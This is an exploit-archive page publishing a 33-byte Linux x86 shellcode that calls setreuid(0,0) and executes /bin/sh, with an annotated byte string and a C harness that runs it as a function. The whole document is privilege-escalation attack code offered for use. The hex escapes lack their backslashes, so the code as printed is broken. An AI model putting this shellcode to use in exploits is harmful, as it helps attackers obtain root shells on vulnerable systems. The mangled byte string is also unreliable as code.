[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : linux/x86 setreuid(0,0) execve("/bin/sh", ["/bin/sh", NULL]) 33 bytes
# Published : 2006-04-03
# Author : Gotfault Security
# Previous Title : linux/x86 setuid(0),setgid(0) execve(/bin/sh, [/bin/sh, NULL]) 37 bytes
# Next Title : linux/x86 HTTP/1.x GET, Downloads and JMP - 68 bytes+


/*
 * (Linux/x86) setreuid(0,0) + execve("/bin/sh", ["/bin/sh", NULL])
 * - 33 bytes
 * - xgc@gotfault.net
 *
 */

char shellcode[] =

  "x6ax46"			// push   $0x46
  "x58"			// pop    %eax
  "x31xdb"			// xor	  %ebx, %ebx
  "x31xc9"			// xor	  %ecx, %ecx
  "xcdx80"			// int    $0x80

  "x31xd2"			// xor    %edx, %edx
  "x6ax0b"			// push   $0xb
  "x58"			// pop    %eax
  "x52"			// push   %edx
  "x68x2fx2fx73x68"	// push   $0x68732f2f
  "x68x2fx62x69x6e"	// push   $0x6e69622f
  "x89xe3"			// mov    %esp, %ebx
  "x52"			// push   %edx
  "x53"			// push   %ebx
  "x89xe1"			// mov    %esp, %ecx
  "xcdx80";			// int    $0x80
 
int main() {
 
        int (*f)() = (int(*)())shellcode;
        printf("Length: %un", strlen(shellcode));
        f();
}

// www.Syue.com [2006-04-03]